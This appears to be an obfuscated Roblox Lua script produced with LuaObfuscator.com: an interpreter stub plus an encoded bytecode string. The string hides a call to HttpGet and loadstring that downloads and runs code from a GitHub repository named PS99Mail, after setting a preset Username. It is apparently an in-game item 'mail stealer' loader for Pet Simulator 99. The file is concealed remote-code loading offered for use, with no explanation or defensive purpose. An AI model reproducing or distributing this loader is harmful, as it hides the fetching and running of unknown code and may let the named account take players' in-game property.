--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=0 + 0 ;local v83;while true do if (v82==(0 -(0 + 0))) then v83=(v31/((879 -(282 + 595))^(v32-(2 -1))))%((3 -1)^(((v33-(1 + 0)) -(v32-((959 -(892 + 65)) -1))) + (620 -(555 + (152 -88))))) ;return v83-(v83%(932 -(857 + 74))) ;end end else local v84=(1272 -(222 + 4 + 1044))^(v32-(569 -((677 -310) + 201))) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or (117 -(32 + 85)) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(351 -(87 + (645 -382)))) then return v35;end if (v34==(180 -(67 + 84 + 29))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==(953 -(802 + 150))) then return (v38 * (689 -433)) + v37 ;end if (v36==(0 -(0 -0))) then v37,v38=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1189 -(1069 + 118)) ;v36=2 -1 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 1 + 2 );v18=v18 + 4 ;return (v42 * (29809750 -13032534)) + (v41 * (65012 + 524)) + (v40 * 256) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,792 -(368 + 423) ,62 -42 ) * ((20 -(10 + 8))^(122 -90))) + v43 ;local v47=v20(v44,463 -(416 + 26) ,(357 -259) -67 );local v48=((v20(v44,14 + 18 )==1) and  -(3 -2)) or 1 ;if (v47==(0 -0)) then if (v46==0) then return v48 * (438 -(145 + 293)) ;else v47=431 -((903 -(814 + 45)) + (950 -564)) ;v45=0 + 0 ;end elseif (v47==(3533 -(998 + 488))) then return ((v46==(0 + 0 + 0)) and (v48 * ((1 + 0)/(772 -(201 + 571))))) or (v48 * NaN) ;end return v8(v48,v47-((3046 -(261 + 624)) -((206 -90) + 1022)) ) * (v45 + (v46/((8 -6)^(31 + (1101 -(1020 + 60)))))) ;end local function v25(v49)local v50=1423 -(630 + 793) ;local v51;local v52;while true do if (v50==(9 -(16 -10))) then return v6(v52);end if (v50==((35 -26) -7)) then v52={};for v89=1, #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=2 + 1 ;end if (v50==(3 -2)) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=1749 -(760 + 987) ;end if (v50==((16 + 1897) -(1405 + 384 + 124))) then v51=nil;if  not v49 then v49=v23();if (v49==(766 -(745 + 21))) then return "";end end v50=1 + 0 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=156 -(142 + 14) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==(5 -2)) then v60=nil;while true do if (v54==(1795 -(1563 + 230))) then local v97=0 -0 ;local v98;while true do if (v97~=(0 + 0)) then else v98=0;while true do local v108=0;while true do if (v108==(285 -(134 + 151))) then if (v98~=(1665 -(970 + 695))) then else local v132=0 -0 ;while true do if (v132==(0 -0)) then for v166=1 + 0 ,v23() do local v167=1990 -(582 + 1408) ;local v168;local v169;while true do if (v167==(0 -0)) then v168=0;v169=nil;v167=1;end if (v167==(3 -2)) then while true do if ((0 -0)~=v168) then else v169=v21();if (v20(v169,3 -2 ,1825 -(1195 + 629) )~=(0 -0)) then else local v174=241 -(187 + 54) ;local v175;local v176;local v177;while true do if (v174~=(782 -(162 + 618))) then else if (v20(v176,1 + 0 ,1)~=(414 -(15 + 398))) then else v177[984 -(18 + 964) ]=v60[v177[7 -5 ]];end if (v20(v176,2,2)==(1 + 0)) then v177[6 -3 ]=v60[v177[3]];end v174=853 -(20 + 830) ;end if (v174~=(1 + 0)) then else local v178=0 -0 ;while true do if (v178~=(126 -(116 + 10))) then else v177={v22(),v22(),nil,nil};if (v175==(1636 -(1373 + 263))) then local v188=0;local v189;while true do if (0==v188) then v189=1000 -(451 + 549) ;while true do if (v189~=(0 -0)) then else v177[1 + 2 ]=v22();v177[4]=v22();break;end end break;end end elseif (v175==(1 -0)) then v177[4 -1 ]=v23();elseif (v175==(1 + 1)) then v177[7 -4 ]=v23() -((1386 -(746 + 638))^16) ;elseif (v175==(1554 -(1126 + 425))) then local v195=0 + 0 ;local v196;while true do if (v195~=0) then else v196=0 -0 ;while true do if (v196~=(341 -(218 + 123))) then else v177[3]=v23() -((7 -5)^(1597 -(1535 + 46))) ;v177[4 + 0 ]=v22();break;end end break;end end end v178=2 -1 ;end if (v178~=(1 + 0)) then else v174=562 -(306 + 254) ;break;end end end if (v174==3) then if (v20(v176,3,3)==(1 + 0)) then v177[981 -(553 + 424) ]=v60[v177[4]];end v55[v166]=v177;break;end if (v174==(0 -0)) then local v180=0 + 0 ;local v181;while true do if (v180~=(0 + 0)) then else v181=0;while true do if (v181==1) then v174=1468 -(899 + 568) ;break;end if (v181==(0 + 0)) then local v190=0 + 0 ;while true do if (v190~=(2 -1)) then else v181=1;break;end if (v190~=(603 -(268 + 335))) then else v175=v20(v169,292 -(60 + 230) ,3);v176=v20(v169,11 -7 ,578 -(426 + 146) );v190=1;end end end end break;end end end end end break;end end break;end end end for v170=1 + 0 ,v23() do v56[v170-(1457 -(282 + 1174)) ]=v28();end v132=812 -(569 + 242) ;end if (v132~=(4 -3)) then else v98=2 -1 ;break;end end end if (v98~=1) then else return v58;end break;end end end break;end end end if (1~=v54) then else v59=v23();v60={};for v102=1 + 0 ,v59 do local v103=0 + 0 ;local v104;local v105;local v106;local v107;while true do if (v103==(1026 -(706 + 318))) then while true do if (v104==0) then local v111=1251 -(721 + 530) ;while true do if (v111~=(0 + 0)) then else v105=0;v106=nil;v111=2 -1 ;end if (v111==1) then v104=1272 -(945 + 326) ;break;end end end if (v104==(2 -1)) then v107=nil;while true do if (v105==(0 + 0)) then local v154=0 + 0 ;while true do if (v154==(1 -0)) then v105=701 -(271 + 429) ;break;end if ((0 -0)~=v154) then else local v172=0;while true do if (v172~=0) then else local v173=0 + 0 ;while true do if ((1 + 0)~=v173) then else v172=1 -0 ;break;end if ((1500 -(1408 + 92))==v173) then v106=v21();v107=nil;v173=217 -(42 + 174) ;end end end if (v172==(1087 -(461 + 625))) then v154=1289 -(993 + 295) ;break;end end end end end if ((1 + 0)==v105) then if (v106==1) then v107=v21()~=(0 + 0) ;elseif (v106==(1 + 1)) then v107=v24();elseif (v106==(1507 -(363 + 1141))) then v107=v25();end v60[v102]=v107;break;end end break;end end break;end if (v103~=(1171 -(418 + 753))) then else v104=0;v105=nil;v103=2 -1 ;end if (v103~=(1 + 0)) then else v106=nil;v107=nil;v103=1 + 1 ;end end end v58[3]=v21();v54=2;end if (v54==(0 + 0)) then local v100=0 + 0 ;local v101;while true do if (v100==(0 + 0)) then v101=0;while true do if (v101~=(531 -(406 + 123))) then else v54=1770 -(1749 + 20) ;break;end if (v101==(1 + 0)) then local v109=1322 -(1249 + 73) ;while true do if (v109==0) then v57={};v58={v55,v56,nil,v57};v109=1901 -(106 + 1794) ;end if (v109==(1 + 0)) then v101=1 + 1 ;break;end end end if (v101==(0 -0)) then local v110=0;while true do if ((1 -0)~=v110) then else v101=2 -1 ;break;end if (v110~=0) then else v55={};v56={};v110=1;end end end end break;end end end end break;end if (v53==(115 -(4 + 110))) then v56=nil;v57=nil;v53=586 -(57 + 527) ;end if (v53==(1427 -(41 + 1386))) then v54=0;v55=nil;v53=104 -(17 + 86) ;end if (v53==2) then local v87=0 -0 ;while true do if (v87==(0 + 0)) then v58=nil;v59=nil;v87=1 -0 ;end if (v87~=(2 -1)) then else v53=3;break;end end end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v86=0;while true do if (1==v86) then if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80>0) then v77[v79[2]]=v79[3];else local v114=v79[2];local v115,v116=v70(v77[v114](v13(v77,v114 + 1 ,v79[3])));v72=(v116 + v114) -1 ;local v117=0;for v127=v114,v72 do v117=v117 + 1 ;v77[v127]=v115[v117];end end elseif (v80<=2) then v77[v79[2]]();elseif (v80>3) then do return;end else local v133=v79[2];local v134=v77[v79[3]];v77[v133 + 1 ]=v134;v77[v133]=v134[v79[4]];end elseif (v80<=7) then if (v80<=5) then v71=v79[3];elseif (v80>6) then v77[v79[2]]=v79[3];else for v156=v79[2],v79[3] do v77[v156]=nil;end end elseif (v80<=8) then local v119=v79[2];local v120,v121=v70(v77[v119](v13(v77,v119 + 1 ,v79[3])));v72=(v121 + v119) -1 ;local v122=0;for v130=v119,v72 do local v131=0;while true do if (v131==0) then v122=v122 + 1 ;v77[v130]=v120[v122];break;end end end elseif (v80>9) then for v158=v79[2],v79[3] do v77[v158]=nil;end elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end elseif (v80<=15) then if (v80<=12) then if (v80==11) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end elseif (v80<=13) then do return;end elseif (v80>14) then local v144=v79[2];v77[v144]=v77[v144](v13(v77,v144 + 1 ,v72));else v71=v79[3];end elseif (v80<=18) then if (v80<=16) then local v123=v79[2];v77[v123]=v77[v123](v13(v77,v123 + 1 ,v72));elseif (v80==17) then v77[v79[2]]();else v63[v79[3]]=v77[v79[2]];end elseif (v80<=19) then v63[v79[3]]=v77[v79[2]];elseif (v80>20) then local v149=v79[2];local v150=v77[v79[3]];v77[v149 + 1 ]=v150;v77[v149]=v150[v79[4]];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end v71=v71 + 1 ;break;end if (0==v86) then v79=v67[v71];v80=v79[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503093O004F646B64626662666A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012013O00014O000A000100013O00260B3O00020001000100040E3O00020001001201000100013O00260B000100050001000100040E3O00050001001201000200033O001213000200023O00120C000200043O00120C000300053O002003000300030006001201000500076O000300054O000F00023O00022O001100020001000100040E3O0014000100040E3O0005000100040E3O0014000100040E3O000200012O00043O00017O00",v9(),...);
